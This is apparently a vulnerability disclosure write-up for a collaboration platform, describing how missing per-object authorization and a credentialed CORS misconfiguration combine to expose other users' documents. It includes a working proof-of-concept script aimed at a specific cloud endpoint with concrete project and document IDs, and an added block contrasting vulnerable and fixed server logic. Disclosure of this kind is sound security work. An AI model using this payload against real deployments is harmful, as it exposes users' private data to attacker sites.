Broken Object Level Authorization (BOLA) combined with credentialed CORS misconfiguration enables cross-user, cross-origin authenticated document exfiltration.

GHSA ID: GHSA-3m6r-g5gh-wq6c
Official Advisory: https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-3m6r-g5gh-wq6c

Introduction

Most vulnerabilities are dangerous individually.

But when authorization flaws and browser misconfigurations combine, the impact multiplies.

In this research, I identified a real-world deployment vulnerable to:

  • Broken Object Level Authorization (BOLA)
  • Credentialed CORS misconfiguration

Together, they enabled cross-user authenticated data exfiltration across origins.

Step 1 — Broken Object Level Authorization

Documents were explicitly restricted per user.

Yet another authenticated user could retrieve them simply by referencing the document ID.

No server-side ownership validation. Direct object access.

Classic BOLA.

Step 2 — CORS Misconfiguration

The backend allowed:

Access-Control-Allow-Origin: <attacker domain>
Access-Control-Allow-Credentials: true

This permits malicious websites to:

  • Send authenticated requests
  • Include victim session cookies
  • Read sensitive API responses

The Same-Origin Policy collapses.
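To make the two failures concrete, here is an added example (not code from the advisory or from the affected project) showing each weak server-side behaviour beside its fix: origin reflection with credentials versus a static allowlist, and id-only document lookup versus an ownership check. The document store, user names and allowed origin are constructed for illustration.

```javascript
// Added example, not part of the advisory: minimal server-side logic
// contrasting the weak behaviours described above with their fixes.
// All data below is constructed for illustration.

// Constructed in-memory store: each document records its owner.
const documents = new Map([
  ["doc-1", { owner: "alice", body: "alice's private notes" }],
  ["doc-2", { owner: "bob", body: "bob's private notes" }],
]);

// Vulnerable CORS: reflects any Origin and still allows credentials, so any
// site can make the victim's browser send its cookies and read the response.
function corsHeadersVulnerable(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Fixed CORS: only an exact match against a static allowlist is granted
// credentialed access; any other origin gets no CORS headers, so the browser
// refuses to expose the response to that page.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]); // assumed origin
function corsHeadersFixed(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // caches must not reuse this response for other origins
  };
}

// Vulnerable lookup (BOLA): authentication is checked, but any logged-in
// user can read any document simply by knowing its id.
function getDocumentVulnerable(session, docId) {
  if (!session.user) return { status: 401 };
  const doc = documents.get(docId);
  return doc ? { status: 200, body: doc.body } : { status: 404 };
}

// Fixed lookup: the object-level check ties the document to the requester.
// Returning 404 for both "missing" and "not yours" avoids confirming ids.
function getDocumentFixed(session, docId) {
  if (!session.user) return { status: 401 };
  const doc = documents.get(docId);
  if (!doc || doc.owner !== session.user) return { status: 404 };
  return { status: 200, body: doc.body };
}
```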

🔥 Proof of Concept (PoC)

Attack Flow

  1. Victim logs into the application.
  2. Victim visits a malicious webpage.
  3. JavaScript on that page executes an authenticated fetch request.

Exploit Code

<script>
fetch("https://cloud.appwrite.io/v1/databases/6981d87b002e1c8dbc0d/collections/documents/documents/69981f2500182f323cd2", {
  credentials: "include",
  headers: {
    "X-Appwrite-Project": "6981d34b0036b9515a07",
    "X-Appwrite-Response-Format": "1.8.0"
  }
})
.then(r => r.json())
.then(data => {
  document.body.innerHTML = "<pre>" + JSON.stringify(data, null, 2) + "</pre>";
});
</script>

Result

The malicious origin successfully retrieves and renders a private document belonging to another user.

No token theft. No brute force. Just chained trust failures.

Why This Matters

This exploit chain defeats:

  1. Authorization boundary
  2. Browser isolation boundary

It enables scalable authenticated data harvesting with minimal attacker effort.
